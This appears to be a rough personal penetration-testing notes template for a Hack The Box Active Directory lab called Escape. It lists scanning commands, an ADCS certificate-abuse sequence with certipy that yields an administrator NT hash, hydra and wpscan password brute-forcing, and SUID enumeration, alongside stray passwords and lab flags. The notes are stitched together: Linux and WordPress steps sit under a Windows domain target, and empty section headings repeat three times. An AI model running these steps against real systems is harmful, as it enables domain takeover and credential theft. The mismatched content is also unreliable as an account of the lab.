HTB_AD_Escape: Pentration Testing Report

Name	item
Platform	OSCP Play Ground
Date	2025-09-15 14:54:49
Auth	Blackwin
Tools used	nmap; gobuster; brupsuite; wpscan
Key words	id_rsa; polkit; LXD
Ip address	10.10.11.202
Flag	proof.txt: 9e89507dcfd2001796d15b5eae75a18clocal.txt: 53825454332a4b5d2c4b14a7315ec6d4

1. Initial Reconasission

Port scanning

rustscan -a 10.10.11.202 --scripts none --ulimit 5000 | tee scans/rustscan
sudo nmap -sCV -p53,88,135,139,389,593,636,1433,3268,3269,464,445,5985,9389,49667,49690,49689,49709,49725,49744 10.10.11.202 -oN scans/nmap
sudo nmap -sCV -p- --open 10.10.11.202 -oN scans/nmap-all

2. Enumeration

FTP Enum

certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication

certipy auth -pfx administrator.pfx                                                                                                
/home/kali/.pyenv/versions/pen3/lib/python3.10/site-packages/certipy/version.py:1: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

administrator; a52f78e4c751e5f5e17e1e9f3e58f4ee

ftp,lftp

REGGIE1234ronnie

SMB Enum

enum4linux

Web Enum

directory brute

ffuf -u http://10.10.11.202/FUZZ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://10.10.11.202/ -w /usr/share/wordlists/dirb/big.txt

brute force login

hydra -l loly -P rockyou.txt 10.10.11.202 http-post-form /wordpress/wp-login.php:F=Error -V -t 5 -w 1 -o results.txt
wpscan --url http://10.10.11.202/wordpress -U loly -P rockyou.txt

3. Initial Shell

4. Post-Enumeration

get flag: find / -name local.txt 2>/dev/null

get basic info:

OS version:
sudo version:
psexec version:
users: cat /etc/passwd
flag: find / -name local.txt 2>/dev/null
SUDI binaries:
find / -user root -perm -4000 -exec ls -ldb {} ; 2>/dev/null
find / -uid 0 -perm -6000 -type f 2>/dev/null

HTB_AD_Escape: Pentration Testing Report

1. Initial Reconasission

2. Enumeration

FTP Enum

SMB Enum

Web Enum

3. Initial Shell

4. Post-Enumeration

5. Root Shell

6. What learned

HTB_AD_Escape: Pentration Testing Report ​

1. Initial Reconasission ​

2. Enumeration ​

FTP Enum ​

SMB Enum ​

Web Enum ​

3. Initial Shell ​

4. Post-Enumeration ​

5. Root Shell ​

6. What learned ​

HTB_AD_Escape: Pentration Testing Report

1. Initial Reconasission

2. Enumeration

FTP Enum

SMB Enum

Web Enum

3. Initial Shell

4. Post-Enumeration

5. Root Shell

6. What learned